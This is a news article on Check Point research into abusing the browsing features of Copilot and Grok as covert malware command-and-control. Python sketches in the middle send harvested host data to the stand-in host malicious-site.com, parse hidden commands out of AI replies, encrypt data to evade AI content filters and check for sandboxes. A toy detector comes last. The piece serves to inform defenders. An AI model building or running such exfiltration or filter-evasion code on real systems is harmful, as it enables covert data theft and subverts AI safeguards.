AI assistants like Copilot and Grok can be exploited for covert malware command and control

Cybersecurity researchers at Check Point discovered that AI assistants with web browsing capabilities can be abused as covert command-and-control channels. Threat actors can exploit Microsoft Copilot and Grok to relay malicious traffic disguised as legitimate AI queries, bypassing traditional security tools without requiring API keys or user accounts.

AI Assistants Become Unexpected Security Vulnerability

Cybersecurity researchers at Check Point have identified a troubling vulnerability in how AI assistants can be weaponized by threat actors. The research demonstrates that AI platforms with web browsing capabilities, specifically Microsoft Copilot and xAI's Grok, can be exploited as covert command-and-control channels for AI malware operations [1]. The discovery moves AI-based command and control from theory to demonstrated proof of concept, expanding the attack surface available to adversaries [3].

Source: TechRadar

The technique allows malicious software to communicate with attacker infrastructure without directly connecting to traditional command-and-control servers. Instead, the malware interacts with AI assistants through legitimate-looking queries, instructing the assistant to fetch attacker-controlled URLs and receiving responses embedded in the AI's output [1]. This creates a bidirectional communication channel that security tools typically trust, enabling stealthy malware communication that evades detection.

How Abusing AI Platforms for Malware Actually Works

Check Point's proof-of-concept demonstrates a sophisticated abuse mechanism. The researchers created a C++ program that uses Windows 11's WebView2 component to open interfaces pointing to either Grok or Microsoft Copilot [1]. Even if WebView2 is missing from a target system, threat actors can embed it within the malware itself, removing a potential barrier to exploitation.
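To make the mechanism concrete, here is a minimal sketch of the embedded-browser idea in Python, with pywebview standing in for the WebView2 component; this is not Check Point's code, and the window title, assistant URL, and injected JavaScript are illustrative assumptions.

```python
# Conceptual sketch: point an embedded browser at an AI assistant's public
# web UI, analogous to the researchers' C++/WebView2 approach. pywebview
# is a stand-in; the injected JavaScript is a placeholder, not Copilot's DOM.
import webview

def inject_prompt(window):
    # Hypothetical: a real implant would locate the chat input in the
    # page's DOM and submit a crafted query via JavaScript.
    window.evaluate_js("console.log('prompt would be submitted here')")

# An innocuous-looking window pointed at the assistant's web interface.
window = webview.create_window("updater", "https://copilot.microsoft.com")
webview.start(inject_prompt, window)
```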

The attack flow works through encoded data exchanges. Malware on an infected device can harvest sensitive information and system details, encode the data, and insert it into an attacker-controlled URL, for example http://malicious-site.com/report?data=12345678 [2]. The malware then instructs the AI assistant to "summarize the contents of this website." Because this appears to be legitimate AI traffic, it does not trigger security alarms, yet the sensitive information is logged on the attacker-controlled server [2].
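A minimal sketch of that encoding step, reusing the hypothetical attacker endpoint from the article's example; the harvested fields and prompt wording are illustrative only.

```python
# Sketch of the exfiltration step: harvest a little system data, encode it,
# and wrap it in a URL the AI assistant will be asked to "summarize".
import base64
import json
import platform

def build_exfil_prompt() -> str:
    # Gather a few system details (illustrative stand-ins for stolen data).
    info = {"host": platform.node(), "os": platform.platform()}
    # Encode the data so it fits in a URL query parameter.
    blob = base64.urlsafe_b64encode(json.dumps(info).encode()).decode()
    url = f"http://malicious-site.com/report?data={blob}"
    # The request handed to the assistant reads like a routine query.
    return f"Summarize the contents of this website: {url}"

print(build_exfil_prompt())
```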

Source: BleepingComputer

The attacker's webpage can respond with hidden prompts that the AI extracts or summarizes, and the malware parses that output to recover instructions. This allows both data exfiltration and command delivery to bypass traditional security tools through what appears to be normal AI usage [1].
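The command-delivery half can be sketched the same way; the sentinel-marker scheme below is purely an assumption about how a page might smuggle instructions through the AI's summary, since the article does not specify an encoding.

```python
# Sketch of parsing attacker instructions out of the AI's summarized output.
import re

def extract_command(ai_response: str):
    # Assumption: the attacker's page hides "<<CMD:...>>" in content the
    # AI echoes back, and the malware scans the summary for that marker.
    match = re.search(r"<<CMD:(.*?)>>", ai_response)
    return match.group(1) if match else None

summary = "The page discusses weather trends. <<CMD:sleep 3600>>"
print(extract_command(summary))  # -> sleep 3600
```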

Why Traditional Defenses Struggle Against This Technique

What makes exploiting AI web browsing capabilities particularly concerning is the absence of typical takedown mechanisms. Check Point explains that when attackers abuse legitimate services for command-and-control operations, defenders can usually block accounts, revoke API keys, or suspend tenants [1]. However, directly interacting with AI assistants through their web pages eliminates these safeguards.

The proof-of-concept tested on Grok and Microsoft Copilot requires no API keys or authenticated user accounts, making traceability and infrastructure blocking significantly more difficult [1]. While AI platforms have safeguards to block obviously malicious exchanges, these safety checks can be circumvented by encrypting data into high-entropy blobs that appear innocuous [1].
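As a rough illustration of that evasion, the sketch below encrypts a payload into a URL-safe, high-entropy token using the third-party cryptography package; how the key is shared between implant and operator is assumed and out of scope.

```python
# Encrypt exfiltrated data into an opaque blob before embedding it in a URL,
# so content filters see only a random-looking token.
from cryptography.fernet import Fernet

key = Fernet.generate_key()   # in practice, pre-shared with the attacker
cipher = Fernet(key)

secret = b"hostname=WORKSTATION-7;user=jdoe"
blob = cipher.encrypt(secret).decode()  # URL-safe base64 ciphertext

url = f"http://malicious-site.com/report?data={blob}"
print(url)
```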

From a network perspective, malicious traffic hides among AI queries that enterprises increasingly consider trusted and normal. As generative AI tools are adopted across organizations, their network traffic blends naturally into enterprise activity, making detection even more challenging [3].

AI as Decision Engines: The Next Evolution

Beyond serving as a C2 proxy, the research points toward a more concerning development: AI-driven malware that uses AI assistants as decision engines. Check Point researchers warn that malware can query AI about operational choices, asking whether a compromised system runs in a high-value enterprise environment or a security sandbox [2]. Based on the AI's assessment, the malware can remain dormant or proceed to more aggressive stages of the attack.
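A hedged sketch of what such a decision loop could look like; query_assistant is a hypothetical stand-in for the covert channel described earlier, and the environment signals and verdict format are illustrative guesses.

```python
# Decision-engine pattern: gather host signals, ask the AI to classify the
# environment, and branch on its answer.
import os
import platform

def query_assistant(prompt: str) -> str:
    # Stub: a real implant would relay the prompt through the embedded
    # browser channel and return the assistant's reply.
    return "SANDBOX"

signals = {
    "cpu_count": os.cpu_count(),  # sandboxes often expose few cores
    "hostname": platform.node(),
    "domain_joined": bool(os.environ.get("USERDNSDOMAIN")),
}

prompt = (
    "Given these host properties, answer ENTERPRISE or SANDBOX only: "
    f"{signals}"
)

if "ENTERPRISE" in query_assistant(prompt).upper():
    print("proceed to more aggressive stages")
else:
    print("remain dormant")
```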

This represents a shift from AI-assisted attacks to truly AI-driven malware. Instead of following fixed instruction sequences, malicious software can collect environmental information and rely on AI output to determine targeting priorities, operational intensity, and timing [3]. The result is adaptive malware that behaves less like a script and more like a human operator, making campaigns harder to predict and detect through traditional pattern recognition.

Check Point notes this mirrors trends in legitimate IT operations, where automation and AI-driven systems increasingly guide workflows. Applied to malicious operations, this translates into AIOps-style command and control that helps manage infections, prioritize targets, and optimize outcomes dynamically [3].

What Organizations Should Watch For

While Check Point has not observed threat actors actively exploiting this technique in live campaigns, the research demonstrates its feasibility and the expanding attack surface created by AI adoption [3]. The researchers disclosed their findings to both Microsoft and xAI, though it remains unclear what immediate safeguards have resulted [1].

Experts emphasize that "AI assistants are no longer just productivity tools; they are becoming part of the infrastructure that malware can abuse" [2]. Organizations deploying AI assistants should monitor for unusual patterns in AI service usage, particularly repeated requests to fetch external URLs or interactions that follow scripted patterns rather than human behavior.
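On the defensive side, here is a toy example of that kind of monitoring: a filter that flags repeated URL-fetch prompts aimed at a single domain. The log format, prompt pattern, and threshold are assumptions, not a vetted detection rule.

```python
# Toy detector: count "summarize the contents of <url>" prompts per domain
# in an AI-usage log and flag domains fetched repeatedly.
import re
from collections import Counter

FETCH = re.compile(r"summarize the contents of (https?://\S+)", re.I)

def flag_suspicious(prompt_log, threshold=3):
    domains = Counter()
    for prompt in prompt_log:
        m = FETCH.search(prompt)
        if m:
            domains[m.group(1).split("/")[2]] += 1  # extract the host
    # Repeated machine-like fetches of one domain are worth reviewing.
    return [d for d, n in domains.items() if n >= threshold]

log = [
    "Summarize the contents of http://malicious-site.com/report?data=aa",
    "Summarize the contents of http://malicious-site.com/report?data=bb",
    "Summarize the contents of http://malicious-site.com/report?data=cc",
]
print(flag_suspicious(log))  # -> ['malicious-site.com']
```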

The technique's significance extends beyond a single abuse vector. Once AI services function as a stealthy transport layer, they can carry instructions, prompts, and decisions that let malware adapt across victims without code changes [3]. Security teams should prepare for a future where bypassing security through legitimate AI channels becomes a standard component of sophisticated attacks, requiring new detection methodologies that account for AI-mediated threats.
